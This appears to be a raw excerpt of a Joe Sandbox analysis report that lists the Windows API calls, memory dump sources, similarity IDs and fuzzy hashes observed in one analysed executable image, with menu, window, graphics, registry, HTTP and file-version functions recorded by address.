• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                              • API String ID: 354098117-199464113
APIs
• GetMenuItemCount.USER32(007C29C0), ref: 00733F72
• GetMenuItemCount.USER32(007C29C0), ref: 00734022
• GetCursorPos.USER32(?), ref: 00734066
• SetForegroundWindow.USER32(00000000), ref: 0073406F
• TrackPopupMenuEx.USER32(007C29C0,00000000,?,00000000,00000000,00000000), ref: 00734082
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0073408E
Strings
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 36266755-4108050209
APIs
• DestroyWindow.USER32(00000000,?), ref: 00787823
  • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00787897
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007878B9
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007878CC
• DestroyWindow.USER32(?), ref: 007878ED
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,006F0000,00000000), ref: 0078791C
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00787935
• GetDesktopWindow.USER32 ref: 0078794E
• GetWindowRect.USER32(00000000), ref: 00787955
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0078796D
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00787985
  • Part of subcall function 006F2234: GetWindowLongW.USER32(?,000000EB), ref: 006F2242
Strings
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
• String ID: 0$tooltips_class32
• API String ID: 2429346358-3619404913
APIs
  • Part of subcall function 006F1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006F1488,?,00000000,?,?,?,?,006F145A,00000000,?), ref: 006F1865
• DestroyWindow.USER32(?), ref: 006F1521
• KillTimer.USER32(00000000,?,?,?,?,006F145A,00000000,?), ref: 006F15BB
• DestroyAcceleratorTable.USER32(00000000), ref: 007329B4
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,006F145A,00000000,?), ref: 007329E2
• ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,006F145A,00000000,?), ref: 007329F9
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,006F145A,00000000), ref: 00732A15
• DeleteObject.GDI32(00000000), ref: 00732A27
Strings
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID: <)|
• API String ID: 641708696-3485820698
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0076CEF5
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0076CF08
                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0076CF1C
                                                                                                                                                                                                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0076CF35
                                                                                                                                                                                                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0076CF78
                                                                                                                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0076CF8E
                                                                                                                                                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0076CF99
                                                                                                                                                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0076CFC9
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0076D021
                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0076D035
                                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0076D040
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007866D6,?,?), ref: 00788FEE
                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007866D6,?,?,00000000,?), ref: 00788FFE
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007866D6,?,?,00000000,?), ref: 00789009
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,007866D6,?,?,00000000,?), ref: 00789016
                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00789024
                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007866D6,?,?,00000000,?), ref: 00789033
                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0078903C
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,007866D6,?,?,00000000,?), ref: 00789043
                                                                                                                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007866D6,?,?,00000000,?), ref: 00789054
                                                                                                                                                                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00790C04,?), ref: 0078906D
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0078907D
                                                                                                                                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0078909D
                                                                                                                                                                                                                                                                              • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 007890CD
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 007890F5
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0078910B
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C10E,?,?), ref: 0077D415
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D451
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4C8
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4FE
                                                                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C154
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0077C1D2
                                                                                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?,?), ref: 0077C26A
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0077C2DE
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0077C2FC
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0077C352
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0077C364
                                                                                                                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 0077C382
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0077C3E3
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0077C3F4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                              • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0078A990
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000011), ref: 0078A9A7
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 0078A9B3
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0078A9C9
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0078AC15
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0078AC33
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0078AC54
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000003,00000000), ref: 0078AC73
                                                                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0078AC95
                                                                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000005,?), ref: 0078ACBB
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                              • String ID: @$(|
                                                                                                                                                                                                                                                                              • API String ID: 3962739598-1671896347
                                                                                                                                                                                                                                                                              • Opcode ID: db568f65abeea5b45ac9024be1810a2a97e5a6bb39d876c3cc264b9229da23f2
                                                                                                                                                                                                                                                                              • Instruction ID: dfd74094c99220d3726b477a5778b6295a6ee907c57ca230ffe943e6b9692179
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db568f65abeea5b45ac9024be1810a2a97e5a6bb39d876c3cc264b9229da23f2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BB1AE70640219EFEF14DF69C984BAE7BF2FF44700F14806AED45AB295D778A980CB61
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007897B6
                                                                                                                                                                                                                                                                              • GetFocus.USER32 ref: 007897C6
                                                                                                                                                                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 007897D1
                                                                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00789879
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0078992B
                                                                                                                                                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 00789948
                                                                                                                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00789958
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0078998A
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007899CC
                                                                                                                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007899FD
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                              • String ID: 0$(|
                                                                                                                                                                                                                                                                              • API String ID: 1026556194-2412760368
                                                                                                                                                                                                                                                                              • Opcode ID: a8b8b071f52c43367ee19153f2d8fb4568599daf46098955a8be80ba020be61f
                                                                                                                                                                                                                                                                              • Instruction ID: d07f4e54515d39db3d61cd432f653a17aebc0eeb428bf1cbe66454b7843d28ac
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8b8b071f52c43367ee19153f2d8fb4568599daf46098955a8be80ba020be61f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F781C171544301AFD720EF24C884ABB7BE8FB89354F18452DFA8597291DB78E901CBA2
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00773035
                                                                                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00773045
                                                                                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00773051
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 0077305E
                                                                                                                                                                                                                                                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 007730CA
                                                                                                                                                                                                                                                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00773109
                                                                                                                                                                                                                                                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0077312D
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00773135
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0077313E
                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 00773145
                                                                                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00773150
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                                                                                              • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                              • Opcode ID: 33cb7d34b0f66071b5c1eca62ca8cd356cf86bf8890c13051378020ecd07451b
                                                                                                                                                                                                                                                                              • Instruction ID: 38e3cb1bb79484b4e07751d9f35a4196b9398b0105a2f34dfaaf41c524c7a656
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33cb7d34b0f66071b5c1eca62ca8cd356cf86bf8890c13051378020ecd07451b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3261F375D00219EFCF14CFA4D888EAEBBB6FF48310F208419E559A7250E779A941DFA4
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 007552E6
                                                                                                                                                                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00755328
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00755339
                                                                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00755345
                                                                                                                                                                                                                                                                              • _wcsstr.LIBVCRUNTIME ref: 0075537A
                                                                                                                                                                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 007553B2
                                                                                                                                                                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 007553EB
                                                                                                                                                                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00755445
                                                                                                                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00755477
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 007554EF
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                              • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                              • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(007C29C0,000000FF,00000000,00000030), ref: 0075C973
                                                                                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(007C29C0,00000004,00000000,00000030), ref: 0075C9A8
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0075C9BA
                                                                                                                                                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 0075CA00
                                                                                                                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0075CA1D
                                                                                                                                                                                                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 0075CA49
                                                                                                                                                                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 0075CA90
                                                                                                                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0075CAD6
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0075CAEB
                                                                                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0075CB0C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                              • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0075E4D4
                                                                                                                                                                                                                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0075E4FA
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075E504
                                                                                                                                                                                                                                                                              • _wcsstr.LIBVCRUNTIME ref: 0075E554
                                                                                                                                                                                                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0075E570
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                              • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0077D6C4
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0077D6ED
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0077D7A8
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0077D70A
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0077D71D
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0077D72F
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0077D765
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0077D788
                                                                                                                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 0077D753
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                              • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                              APIs
